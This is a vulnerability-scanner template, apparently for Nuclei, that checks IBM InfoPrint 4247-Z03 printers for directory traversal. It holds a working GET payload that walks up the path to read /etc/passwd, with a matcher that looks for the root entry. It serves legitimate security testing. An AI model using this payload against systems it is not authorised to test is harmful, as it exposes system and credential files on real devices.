id: ibm-infoprint-lfi

info:
  name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
  author: harshbothra_
  severity: medium
  description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
  reference: https://www.exploit-db.com/exploits/47835
  tags: ibm,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0"
        part: body
